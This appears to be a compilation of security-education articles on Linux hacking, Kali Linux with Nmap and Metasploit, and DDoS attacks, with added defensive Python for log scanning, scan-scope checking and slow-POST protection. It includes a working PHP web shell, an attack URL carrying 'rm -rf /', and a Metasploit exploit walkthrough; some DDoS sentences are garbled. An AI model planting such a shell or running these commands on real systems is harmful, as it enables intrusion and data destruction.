Hacking Linux OS

Linux is the most widely used server operating system, especially for web servers. It is open source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux Hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.

In this article, we will introduce you to what Linux is, its security vulnerabilities and the counter measures you can put in place.

Quick Note on Linux

Linux is an open source operating system. There are many distributions of Linux-based operating systems, such as Red Hat, Fedora, Ubuntu, etc. Unlike other operating systems, Linux is less secure. This is because the source code is freely available, so it is easier to study it for vulnerabilities and exploit them than with operating systems that are not open source. Linux can be used as a server, desktop, tablet, or mobile device operating system.

Linux programs can be operated using either the GUI or commands. The commands are more effective and efficient than using the GUI. For this reason, it helps to know the basic Linux commands.

Linux Hacking Tools

  • Nessus – this tool can be used to scan configuration settings, patches, networks, etc. It can be found at https://www.tenable.com/products/nessus
  • Nmap – this tool can be used to monitor hosts that are running on the server and the services they are using. It can also be used to scan for ports. It can be found at https://nmap.org/
  • SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL injection, XSS, etc. It can be found at http://www-arc.com/sara/sara.html

The above list is not exhaustive; it gives you an idea of the tools available for hacking Linux systems.

How to prevent Linux hacks

Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.

  • Patch management – patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
  • Proper OS configuration – other exploits take advantage of weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common application passwords, default user names and some port numbers should be changed.
  • Intrusion Detection System – such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.

Hacking Activity: Hack an Ubuntu Linux System using PHP

In this practical scenario, we will provide you with basic information on how PHP can be used to compromise a Linux system. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.

PHP comes with two functions that can be used to execute Linux commands: exec() and shell_exec(). The function exec() returns the last line of the command output, while shell_exec() returns the whole output of the command as a string.

For demonstration purposes, let’s assume the attacker manages to upload the following file to a web server.

<?php
// Deliberately insecure: the command is taken straight from the "cmd" query parameter.
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "executing shell command:-> $cmd<br>";
// shell_exec() runs the string through the system shell and returns all of its output.
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
?>

HERE,

The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results are returned to the browser.

The above code can be exploited using the following URL:

http://localhost/cp/konsole.php?cmd=ls%20-l

HERE,

  • “…konsole.php?cmd=ls%20-l” assigns the value ls -l to the variable cmd (%20 is the URL encoding of a space).

The command executed against the server will be

shell_exec('ls -l');

Executing the above code on a web server gives results similar to the following.

Hacking Linux Systems

The above command simply lists the files in the current directory together with their permissions.

Let’s suppose the attacker passes the following command:

rm -rf /

HERE,

  • “rm” removes files
  • “-rf” makes the rm command run recursively and without prompting, deleting all folders and files
  • “/” instructs the command to start deleting from the root directory

The attack URL would look something like this:

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
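A defender-side check for the requests shown above, added here as an example (it is not code from the original article): it scans constructed Apache access-log lines, decodes each request's query string and flags any command-style parameter whose decoded value is a shell command, rating destructive or chained commands higher. The log lines, the watched parameter names, the destructive-command list and the severity labels are assumptions for illustration.

```python
"""Flag web requests that hand a shell command to a script such as konsole.php.

Added example, not part of the original article. It scans constructed Apache
combined-format access log lines, decodes each request's query string and
reports any command-style parameter whose decoded value looks like a shell
command. Severity rises for destructive commands and for shell metacharacters
that chain or redirect commands.
"""
import re
import shlex
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format: client - user [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Parameter names to watch: the one the article's script reads plus common variants (assumed).
COMMAND_PARAMS = {"cmd", "command", "exec"}
# Commands whose presence in a web parameter is almost never legitimate (assumed list).
DESTRUCTIVE = {"rm", "mkfs", "dd", "shutdown", "reboot"}
# Shell metacharacters that chain, pipe, substitute or redirect commands.
SHELL_META = re.compile(r"[;&|`$<>]")


def decode_params(target: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs from the request target.

    parse_qsl() percent-decodes once; unquote() decodes a second time so that a
    double-encoded value (%2520 for a space) is still seen as the attacker sees it.
    """
    query = urlsplit(target).query
    return [(name, unquote(value)) for name, value in parse_qsl(query, keep_blank_values=True)]


def classify(value: str) -> Optional[str]:
    """Severity for a decoded parameter value: 'critical', 'high', 'medium' or None."""
    try:
        words = shlex.split(value)
    except ValueError:            # unbalanced quotes: still worth treating as a command
        words = value.split()
    if not words:
        return None
    if words[0] in DESTRUCTIVE:   # e.g. rm -rf /
        return "critical"
    if SHELL_META.search(value):  # e.g. ls -l;whoami
        return "high"
    return "medium"               # any command at all reaching this parameter is suspect


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request that carries a command in a watched parameter."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in decode_params(m["target"]):
            if name.lower() not in COMMAND_PARAMS:
                continue
            severity = classify(value)
            if severity is not None:
                findings.append({
                    "client": m["client"], "time": m["time"], "param": name,
                    "command": value, "severity": severity, "status": int(m["status"]),
                })
    return findings


# Constructed log lines that mirror the article's URLs; not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /cp/konsole.php?cmd=ls%20-l HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /cp/konsole.php?cmd=rm%20-rf%20/ HTTP/1.1" 200 0 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /cp/konsole.php?cmd=ls%20-l%3Bwhoami HTTP/1.1" 200 640 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?page=home HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:58:00 +0000] "GET /cp/konsole.php?cmd=rm%2520-rf%2520/ HTTP/1.1" 200 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['client']:14} {f['param']}={f['command']!r}")
```

The double-decoding step matters: the last sample line encodes the spaces twice, and a check that decodes only once would see a harmless-looking literal instead of the destructive command.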

Summary

  • Linux is a popular operating system for servers, desktops, tablets and mobile devices.
  • Linux is open source, and the source code can be obtained by anyone. This makes it easy to spot vulnerabilities.
  • Basic and networking commands are valuable to Linux hackers.
  • Vulnerabilities are weaknesses that can be exploited to compromise a system.
  • Good security practices can help to protect a system from being compromised by an attacker.

Kali Linux Tutorial: What is, Install, Utilize Metasploit and Nmap

What is Kali Linux?

Kali Linux is a security distribution of Linux specifically designed for digital forensics and penetration testing. It was developed by Mati Aharoni and Devon Kearns of Offensive Security as a rewrite of BackTrack, their previous information security operating system. The first release, Kali 1.0.0, was introduced in March 2013. Offensive Security currently funds and supports Kali Linux. If you were to visit Kali’s website today (www.kali.org), you would see a large banner stating, “Our Most Advanced Penetration Testing Distribution, Ever.” A very bold statement that ironically has yet to be disproven.

Kali Linux has over 600 preinstalled penetration-testing applications to discover, each with its own flexibility and use case. Kali Linux does an excellent job of separating these useful utilities into the following categories:

  1. Information Gathering
  2. Vulnerability Analysis
  3. Wireless Attacks
  4. Web Applications
  5. Exploitation Tools
  6. Stress Testing
  7. Forensics Tools
  8. Sniffing & Spoofing
  9. Password Attacks
  10. Maintaining Access
  11. Reverse Engineering
  12. Reporting Tools
  13. Hardware Hacking

Who uses Kali Linux and Why?

Kali Linux is truly a unique operating system, as it’s one of the few platforms openly used by both good guys and bad guys. Security administrators and black hat hackers both use this operating system extensively: one to detect and prevent security breaches, the other to identify and possibly exploit them. The number of tools configured and preinstalled on the operating system makes Kali Linux the Swiss Army knife in any security professional’s toolbox.

Professionals that use Kali Linux

  1. Security Administrators – Security Administrators are responsible for safeguarding their institution’s information and data. They use Kali Linux to review their environment(s) and ensure there are no easily discoverable vulnerabilities.
  2. Network Administrators – Network Administrators are responsible for maintaining an efficient and secure network. They use Kali Linux to audit their network. For example, Kali Linux has the ability to detect rogue access points.
  3. Network Architects – Network Architects are responsible for designing secure network environments. They utilize Kali Linux to audit their initial designs and ensure nothing was overlooked or misconfigured.
  4. Pen Testers – Pen Testers utilize Kali Linux to audit environments and perform reconnaissance on corporate environments which they have been hired to review.
  5. CISO – CISOs, or Chief Information Security Officers, use Kali Linux to internally audit their environment and discover whether any new applications or rogue configurations have been put in place.
  6. Forensic Engineers – Kali Linux possesses a “Forensic Mode”, which allows a Forensic Engineer to perform data discovery and recovery in some instances.
  7. White Hat Hackers – White Hat Hackers, similar to Pen Testers, use Kali Linux to audit and discover vulnerabilities which may be present in an environment.
  8. Black Hat Hackers – Black Hat Hackers utilize Kali Linux to discover and exploit vulnerabilities. Kali Linux also has numerous social engineering applications, which can be utilized by a Black Hat Hacker to compromise an organization or individual.
  9. Grey Hat Hackers – Grey Hat Hackers lie in between White Hat and Black Hat Hackers. They will utilize Kali Linux in the same ways as the two listed above.
  10. Computer Enthusiasts – Computer Enthusiast is a pretty generic term, but anyone interested in learning more about networking or computers in general can use Kali Linux to learn more about Information Technology, networking, and common vulnerabilities.

Kali Linux Installation Methods

Kali Linux can be installed using the following methods:

Ways to Run Kali Linux:

  1. Directly on a PC or Laptop – Using a Kali ISO image, Kali Linux can be installed directly onto a PC or laptop. This method is best if you have a spare PC and are familiar with Kali Linux. Also, if you plan on doing any access point testing, installing Kali Linux directly onto a Wi-Fi enabled laptop is recommended.
  2. Virtualized (VMware, Hyper-V, Oracle VirtualBox, Citrix) – Kali Linux supports most known hypervisors and can easily be imported into the most popular ones. Pre-configured images are available for download from www.kali.org, or an ISO can be used to install the operating system into the preferred hypervisor manually.
  3. Cloud (Amazon AWS, Microsoft Azure) – Given the popularity of Kali Linux, both AWS and Azure provide images for Kali Linux.
  4. USB Boot Disc – Utilizing Kali Linux’s ISO, a boot disc can be created to either run Kali Linux on a machine without actually installing it or for Forensic purposes.
  5. Windows 10 (App) – Kali Linux can now natively run on Windows 10, via the Command Line. Not all features work yet as this is still in beta mode.
  6. Mac (Dual or Single boot) – Kali Linux can be installed on Mac, as a secondary operating system or as the primary. Parallels or Mac’s boot functionality can be utilized to configure this setup.

Install Kali Linux using Virtual Box

The easiest method and arguably the most widely used is installing Kali Linux and running it from Oracle’s VirtualBox.

This method allows you to continue to use your existing hardware while experimenting with the feature-enriched Kali Linux in a completely isolated environment. Best of all, everything is free: both Kali Linux and Oracle VirtualBox are free to use. This tutorial assumes you have already installed Oracle’s VirtualBox on your system and have enabled 64-bit virtualization via the BIOS.

Step 1) Go to https://images.offensive-security.com/virtual-images/kali-linux-2019.2-vbox-amd64.ova

This will download an OVA image, which can be imported into VirtualBox.

Step 2) Open the Oracle VirtualBox application, and from the File menu select Import Appliance

File Menu -> Import Appliance

Step 3) On the following screen, “Appliance to Import”, browse to the location of the downloaded OVA file and click Open

Step 4) Once you click Open, you will be taken back to the “Appliance to Import” screen; simply click Next

Step 5) The following screen, “Appliance Settings”, displays a summary of the system’s settings; leaving the default settings is fine. As shown in the screenshot below, make a note of where the Virtual Machine is located and then click Import.

Step 6) VirtualBox will now Import the Kali Linux OVA appliance. This process could take anywhere from 5 to 10 minutes to complete.

Step 7) Congratulations, Kali Linux has been successfully installed on VirtualBox. You should now see the Kali Linux VM in the VirtualBox Console. Next, we’ll take a look at Kali Linux and some initial steps to perform.

Step 8) Click on the Kali Linux VM within the VirtualBox Dashboard and click Start, this will boot up the Kali Linux Operating System.

Step 9) On the login screen, enter “Root” as the username and click Next.

Step 10) As mentioned earlier, enter “toor” as the password and click SignIn.

You will now be presented with the Kali Linux GUI desktop. Congratulations, you have successfully logged into Kali Linux.

Getting Started with Kali Linux GUI

The Kali Desktop has a few tabs you should initially make a note of and become familiar with: the Applications Tab, the Places Tab, and the Kali Linux Dock.

Applications Tab – Provides a graphical dropdown list of all the applications and tools pre-installed on Kali Linux. Reviewing the Applications Tab is a great way to become familiar with the feature-enriched Kali Linux operating system. Two applications we’ll discuss in this tutorial are Nmap and Metasploit. The applications are placed into different categories, which makes searching for an application much easier.

Accessing Applications

Step 1) Click on Applications Tab

Step 2) Browse to the particular category you’re interested in exploring

Step 3) Click on the Application you would like to start.

Places Tab – Similar to any other GUI Operating System, such as Windows or Mac, easy access to your Folders, Pictures and My Documents is an essential component. Places on Kali Linux provides that accessibility that is vital to any Operating System. By default, the Places menu has the following tabs, Home, Desktop, Documents, Downloads, Music, Pictures, Videos, Computer and Browse Network.

Accessing Places

Step 1) Click on the Places Tab

Step 2) Select the location you would like to access.

Kali Linux Dock – Similar to Apple Mac’s Dock or Microsoft Windows Task Bar, the Kali Linux Dock provides quick access to frequently used / favorite applications. Applications can be added or removed easily.

To Remove an Item from the Dock

Step 1) Right-Click on the Dock Item

Step 2) Select Remove From Favorites

To Add Item to Dock

Adding an item to the Dock is very similar to removing an item from the Dock.

Step 1) Click on the Show Applications button at the bottom of the Dock

Step 2) Right Click on Application

Step 3) Select Add to Favorites

Once completed, the item will be displayed within the Dock.

Kali Linux has many other unique features, which makes this Operating System the primary choice by Security Engineers and Hackers alike. Unfortunately, covering them all is not possible within this tutorial; however, you should feel free to explore the different buttons displayed on the desktop.

What is Nmap?

Network Mapper, better known as Nmap for short, is a free, open-source utility used for network discovery and vulnerability scanning. Security professionals use Nmap to discover devices running in their environments. Nmap can also reveal the services and ports each host is serving, exposing a potential security risk. At the most basic level, consider Nmap as ping on steroids. The more your technical skills evolve, the more usefulness you’ll find in Nmap.

Nmap offers the flexibility to monitor a single host or a vast network consisting of hundreds if not thousands of devices and subnets. The flexibility Nmap offers has evolved over the years, but at its core, it’s a port-scanning tool, which gathers information by sending raw packets to a host system. Nmap then listens for responses and determines if a port is open, closed or filtered.

The first scan you should be familiar with is the basic Nmap scan, which scans the first 1000 TCP ports. If it discovers a port listening, it will display the port as open, closed, or filtered. Filtered means a firewall is most likely in place modifying the traffic on that particular port. Below is a list of Nmap commands which can be used to run the default scan.

Nmap Target Selection

Scan a single IP: nmap 192.168.1.1
Scan a host: nmap www.testnetwork.com
Scan a range of IPs: nmap 192.168.1.1-20
Scan a subnet: nmap 192.168.1.0/24
Scan targets from a text file: nmap -iL list-of-ipaddresses.txt
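The target forms above are worth being able to expand before a scan is launched, so that a typo in a range or a stray host in a list file cannot send probes outside the network you are authorized to test. The following is an added example (not part of the tutorial and not Nmap's own code) that expands a single IP, a CIDR block, Nmap's per-octet range syntax, a bare hostname and an -iL style list, and then partitions the result against an authorized scope; the sample targets and the 192.168.1.0/24 scope are constructed.

```python
"""Expand the Nmap target forms listed above and check them against an authorized scope.

Added example, not part of the original tutorial and not Nmap's own code. It
accepts a single IP, a CIDR block, Nmap's per-octet range syntax (192.168.1.1-20,
and ranges in any octet such as 10.0.0-1.1-5), a hostname (kept as a name; no DNS
lookup is made so the example runs offline) and a target list in the form that
-iL reads, with entries separated by spaces, tabs or newlines.
"""
import ipaddress
import itertools
import re
from typing import Dict, Iterable, List, Union

Target = Union[ipaddress.IPv4Address, str]

# Four dot-separated fields, each either a single octet or a low-high range.
OCTET_SPEC = re.compile(r"^(\d{1,3}(?:-\d{1,3})?)(?:\.(\d{1,3}(?:-\d{1,3})?)){3}$")


def _octet_values(field: str) -> range:
    """'20' -> 20..20, '1-20' -> 1..20; rejects values outside 0..255."""
    lo, _, hi = field.partition("-")
    lo_i, hi_i = int(lo), int(hi or lo)
    if not 0 <= lo_i <= hi_i <= 255:
        raise ValueError(f"bad octet range: {field}")
    return range(lo_i, hi_i + 1)


def expand_spec(spec: str) -> List[Target]:
    """Expand one target specification into IPv4 addresses (or a bare hostname)."""
    spec = spec.strip()
    if not spec:
        return []
    if "/" in spec:                         # CIDR block: Nmap scans every address in it
        return list(ipaddress.ip_network(spec, strict=False))
    if OCTET_SPEC.match(spec):              # dotted quad, possibly with ranges
        fields = [_octet_values(f) for f in spec.split(".")]
        return [ipaddress.IPv4Address(".".join(map(str, combo)))
                for combo in itertools.product(*fields)]
    return [spec]                           # hostname: Nmap resolves it, this example does not


def expand_list(lines: Iterable[str]) -> List[Target]:
    """Expand targets the way nmap -iL reads a file: whitespace-separated entries."""
    targets: List[Target] = []
    for line in lines:
        for entry in line.split():
            targets.extend(expand_spec(entry))
    return targets


def check_scope(targets: Iterable[Target], authorized: Iterable[str]) -> Dict[str, list]:
    """Partition targets into in_scope / out_of_scope / unresolved (hostnames)."""
    nets = [ipaddress.ip_network(a, strict=False) for a in authorized]
    result: Dict[str, list] = {"in_scope": [], "out_of_scope": [], "unresolved": []}
    for t in targets:
        if isinstance(t, str):
            result["unresolved"].append(t)  # resolve and re-check before scanning
        elif any(t in n for n in nets):
            result["in_scope"].append(t)
        else:
            result["out_of_scope"].append(t)
    return result


if __name__ == "__main__":
    # Constructed target list and authorized range for illustration.
    scope = check_scope(expand_list(["192.168.1.1-20 10.0.2.15", "www.testnetwork.com"]),
                        ["192.168.1.0/24"])
    for key, items in scope.items():
        print(f"{key}: {len(items)}")
```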

How to Perform a Basic Nmap Scan on Kali Linux

To run a basic Nmap scan in Kali Linux, follow the steps below. With Nmap as depicted above, you have the ability to scan a single IP, a DNS name, a range of IP addresses, Subnets, and even scan from text files. For this example, we will scan the localhost IP address.

Step 1) From the Dock menu, click on the second tab which is the Terminal

Step 2) The Terminal window should open; enter the command ifconfig, which will return the local IP address of your Kali Linux system. In this example, the local IP address is 10.0.2.15

Step 3) Make a note of the local IP address

Step 4) In the same terminal window, enter nmap 10.0.2.15; this will scan the first 1000 ports on the localhost. Considering this is the base install, no ports should be open.

Step 5) Review results

By default, nmap only scans the first 1000 ports. If you need to scan all 65535 ports, simply modify the above command to include -p-.

nmap -p- 10.0.2.15

Nmap OS Scan

Another basic but useful feature of nmap is the ability to detect the OS of the host system. Kali Linux by default is secure, so for this example, the host system, which Oracle’s VirtualBox is installed on, will be used as an example. The host system is a Windows 10 Surface. The host system’s IP address is 10.28.2.26.

In the Terminal window enter the following nmap command:

nmap -A 10.28.2.26

Review results

Adding -A tells nmap to not only perform a port scan but also try to detect the Operating System.

Nmap is a vital utility in any Security Professional toolbox. Use the command nmap -h to explore more options and commands on Nmap.

What is Metasploit?

The Metasploit Framework is an open source project that provides a public resource for researching vulnerabilities and developing code that gives security professionals the ability to infiltrate their own network and identify security risks and vulnerabilities. Metasploit was recently purchased by Rapid7 (https://www.metasploit.com). However, the community edition of Metasploit is still available on Kali Linux. Metasploit is by far the world’s most used penetration testing utility.

It is important that you are careful when using Metasploit, because scanning a network or environment that is not yours could be considered illegal in some instances. In this tutorial, we’ll show you how to start Metasploit and run a basic scan on Kali Linux. Metasploit is considered an advanced utility and will require some time to become adept with, but once familiar with the application it will be an invaluable resource.

Metasploit and Nmap

Within Metasploit, we can actually utilize Nmap. In this case, you’ll learn how to scan your local VirtualBox subnet from Metasploit using the Nmap utility we just learned about.

Step 1) On the Applications Tab, scroll down to 08-Exploitation Tools and then select Metasploit

Step 2) A terminal box will open, with MSF in the dialog, this is Metasploit

Step 3) Enter the following command

db_nmap -v -sV 10.0.2.15/24

(be sure to replace 10.0.2.15 with your local IP address)

Here:

db_ stands for database: the scan results are stored in Metasploit’s database

-v stands for verbose mode

-sV stands for service version detection

Metasploit Exploit Utility

Metasploit is very robust with its features and flexibility. One common use for Metasploit is the exploitation of vulnerabilities. Below we’ll go through the steps of reviewing some exploits and trying to exploit a Windows 7 machine.

Step 1) Assuming Metasploit is still open, enter hosts -R in the terminal window. This adds the hosts recently discovered to the Metasploit database.

Step 2) Enter “show exploits”; this command will provide a comprehensive look at all the exploits available to Metasploit.

Step 3) Now, try to narrow down the list with this command: search name:Windows 7. This command searches the exploits which specifically include Windows 7; for the purpose of this example we will try to exploit a Windows 7 machine. Depending on your environment, you will have to change the search parameters to meet your criteria. For example, if you have a Mac or another Linux machine, you will have to change the search parameter to match that machine type.

Step 4) For the purposes of this tutorial we will use an Apple iTunes vulnerability discovered in the list. To utilize the exploit, we must enter the complete path which is displayed in the list: use exploit/windows/browser/apple_itunes_playlist

Step 5) If the exploit is successful the command prompt will change to display the exploit name followed by as depicted in the below screenshot.

Step 6) Enter show options to review what options are available to the exploit. Each exploit will, of course, have different options.

Summary

In sum, Kali Linux is an amazing operating system that is widely used by various professionals, from Security Administrators to Black Hat Hackers. Given its robust utilities, stability, and ease of use, it’s an operating system everyone in the IT industry and every computer enthusiast should be familiar with. Utilizing just the two applications discussed in this tutorial will significantly aid a firm in securing its Information Technology infrastructure. Both Nmap and Metasploit are available on other platforms, but their ease of use and pre-installed configuration on Kali Linux makes Kali the operating system of choice when evaluating and testing the security of a network. As stated previously, be careful using Kali Linux, as it should only be used in network environments which you control and/or have permission to test, since some utilities may actually cause damage or loss of data.

What is a DDoS (Denial of Service) Attack?

In computing, a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.

In a distributed denial-of-service attack (DDoS attack), the incoming traffic flooding the victim originates from many different sources. This effectively makes it impossible to stop the attack simply by blocking a single source.

A DoS or DDoS attack is analogous to a group of people crowding the entry door of a shop, making it hard for legitimate customers to enter, thus disrupting trade.

Criminal perpetrators of DoS attacks often target sites or services hosted on high-profile web servers such as banks or credit card payment gateways. Revenge, blackmail  and can motivate these attacks.

Attack techniques

Attack tools

In cases such as MyDoom and Slowloris the tools are embedded in malware and launch their attacks without the knowledge of the system owner. Stacheldraht is a classic example of a DDoS tool. It uses a layered structure where the attacker uses a client program to connect to handlers which are compromised systems that issue commands to the zombie agents which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.

Application-layer attacks

Application-layer attacks employ DoS-causing exploits and can cause server-running software to fill the disk space or consume all available memory or CPU time. Attacks may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim’s disk space with logs. An attacker with shell-level access to a victim’s computer may slow it until it is unusable or crash it by using a fork bomb. Another kind of application-level DoS attack is XDoS (or XML DoS) which can be controlled by modern web application firewalls (WAFs).

Degradation-of-service attacks

Pulsing zombies are compromised computers that are directed to launch intermittent and short-lived floodings of victim websites with the intent of merely slowing them rather than crashing them. This type of attack, referred to as degradation-of-service, can be more difficult to detect and can disrupt and hamper connections to websites for prolonged periods of time, potentially causing more overall disruption than a denial-of-service attack. Exposure of degradation-of-service attacks is complicated further by the matter of discerning whether the server is really being attacked or is experiencing higher than normal legitimate traffic loads.

Denial-of-service Level II

The goal of a DoS L2 (possibly DDoS) attack is to trigger a defense mechanism which blocks the network segment from which the attack originated. In the case of a distributed attack or IP header modification (depending on the kind of security behavior), it will fully block the attacked network from the Internet, but without a system crash.

Distributed DoS attack

A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. Such an attack is often the result of multiple compromised systems (for example, a botnet) flooding the targeted system with traffic. A botnet is a network of zombie computers programmed to receive commands without the owners’ knowledge. When a server is overloaded with connections, new connections can no longer be accepted. The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and that the behavior of each attack machine can be stealthier, making it harder to track and shut down. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines. This, after all, will end up completely crashing a website for periods of time.

DDoS extortion

In 2015, DDoS botnets such as DD4BC grew in prominence, taking aim at financial institutions. Cyber-extortionists typically begin with a low-level attack and a warning that a larger attack will be carried out if a ransom is not paid in Bitcoin. Security experts recommend targeted websites to not pay the ransom. The attackers tend to get into an extended extortion scheme once they recognize that the target is ready to pay.

HTTP slow POST DoS attack

First discovered in 2009, the HTTP slow POST attack sends a complete, legitimate HTTP POST header, which includes a ‘Content-Length’ field to specify the size of the message body to follow. However, the attacker then proceeds to send the actual message body at an extremely slow rate. Due to the entire message being correct and complete, the target server will attempt to obey the ‘Content-Length’ field in the header, and wait for the entire body of the message to be transmitted, which can take a very long time. The attacker establishes hundreds or even thousands of such connections until all resources for incoming connections on the server (the victim) are used up, hence making any further (including legitimate) connections impossible until all data has been sent. It is notable that unlike many other (D)DoS attacks, which try to subdue the server by overloading its network or CPU, an HTTP slow POST attack targets the logical resources of the victim, which means the victim would still have enough network bandwidth and processing power to operate. Further combined with the fact that  will, by default, accept requests up to 2GB in size, this attack can be particularly powerful. HTTP slow POST attacks are difficult to differentiate from legitimate connections and are therefore able to bypass some protection systems. OWASP, an open source web application security project, released a tool to test the security of servers against this type of attacks.
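The defense against slow POST follows directly from the description above: a server must not wait for a declared Content-Length indefinitely but should require body bytes to keep arriving at a minimum rate. The following is an added example (not from the article and not any web server's code) that implements that policy and replays two constructed clients against it; the timeouts, rates and client schedules are assumptions chosen for illustration.

```python
"""Server-side guard against HTTP slow-POST connections.

Added example, not taken from the article or from any web server's source. A
connection that announced a Content-Length must keep delivering body bytes at a
minimum rate, otherwise the server closes it instead of holding a worker until
the promised bytes arrive. The policy mirrors what Apache's mod_reqtimeout
RequestReadTimeout "body=<seconds>,MinRate=<bytes>" option does: an initial
timeout that is extended by one second for every MinRate bytes received. Times
are plain floats so the replay is deterministic and runs offline.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class BodyTransfer:
    """Progress of one request body: what the client promised and what has arrived."""
    client: str
    content_length: int
    started_at: float
    received: int = 0

    def record(self, nbytes: int) -> None:
        self.received += nbytes


class SlowPostGuard:
    """initial: seconds allowed before any body byte is required; min_rate: bytes that
    buy one more second; hard_limit: cap on total body time whatever the rate.
    The defaults are assumed values for the example."""

    def __init__(self, initial: float = 20.0, min_rate: float = 500.0, hard_limit: float = 600.0):
        self.initial, self.min_rate, self.hard_limit = initial, min_rate, hard_limit

    def deadline(self, t: BodyTransfer) -> float:
        earned = t.received / self.min_rate          # seconds earned by bytes delivered so far
        return t.started_at + min(self.initial + earned, self.hard_limit)

    def verdict(self, t: BodyTransfer, now: float) -> str:
        if t.received >= t.content_length:
            return "complete"
        if now > self.deadline(t):
            return "abort"                           # close the connection, free the worker
        return "waiting"


def replay(t: BodyTransfer, chunks: List[Tuple[float, int]], guard: SlowPostGuard,
           horizon: float = 3600.0) -> Tuple[str, float]:
    """Replay scheduled (arrival_time, bytes) chunks against the guard, checking once a
    second as a server's read loop would. Returns (verdict, time of the decision)."""
    pending = sorted(chunks)
    now = t.started_at
    while now <= t.started_at + horizon:
        while pending and pending[0][0] <= now:
            t.record(pending.pop(0)[1])
        v = guard.verdict(t, now)
        if v != "waiting":
            return v, now
        now += 1.0
    return "waiting", now


def run_demo() -> Dict[str, Tuple[str, float]]:
    """Two constructed clients: a 1 MiB upload in 64 KiB chunks every half second, and a
    slow-POST client that promises 1 MB but sends one byte every ten seconds."""
    guard = SlowPostGuard()
    legit = BodyTransfer("198.51.100.5", 1_048_576, 0.0)
    legit_chunks = [(0.5 * k, 65_536) for k in range(1, 17)]
    slow = BodyTransfer("203.0.113.9", 1_000_000, 0.0)
    slow_chunks = [(10.0 * k, 1) for k in range(1, 400)]
    return {"legit": replay(legit, legit_chunks, guard), "slow": replay(slow, slow_chunks, guard)}


if __name__ == "__main__":
    for name, (verdict, when) in run_demo().items():
        print(f"{name}: {verdict} at t={when:.0f}s")
```

The legitimate upload completes in eight seconds, while the slow client, having delivered two bytes by the time its initial allowance runs out, is cut off at the next check instead of occupying a connection slot for the hours its declared length would otherwise take.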

Challenge Collapsar (CC) attack

A Challenge Collapsar (CC) attack is an attack in which standard HTTP requests are sent frequently to a targeted web server, with Uniform Resource Identifiers (URIs) that require complicated, time-consuming algorithms or database operations, in order to exhaust the resources of the targeted web server.

In 2004, a Chinese hacker nicknamed KiKi invented a hacking tool to send these kinds of requests to attack a NSFOCUS firewall named “Collapsar”, and thus the hacking tool was known as “Challenge Collapsar”, or CC for short. Consequently, this type of attack got the name “CC attack”.

Internet Control Message Protocol (ICMP) flood

A smurf attack relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than to a specific machine. The attacker will send large numbers of IP packets with the source address faked to appear to be the address of the victim. Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim’s computer will be flooded with traffic. This overloads the victim computer and can even make it unusable during such an attack.

Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the “ping” command from Unix-like hosts (the -t flag on Windows systems is much less capable of overwhelming a target, also the -l (size) flag does not allow sent packet size greater than 65500 in Windows). It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.

Ping of death is based on sending the victim a malformed ping packet, which will lead to a system crash on a vulnerable system.

The BlackNurse attack is an example of an attack taking advantage of the required Destination Port Unreachable ICMP packets.

Nuke

A Nuke is an old denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop.[52]

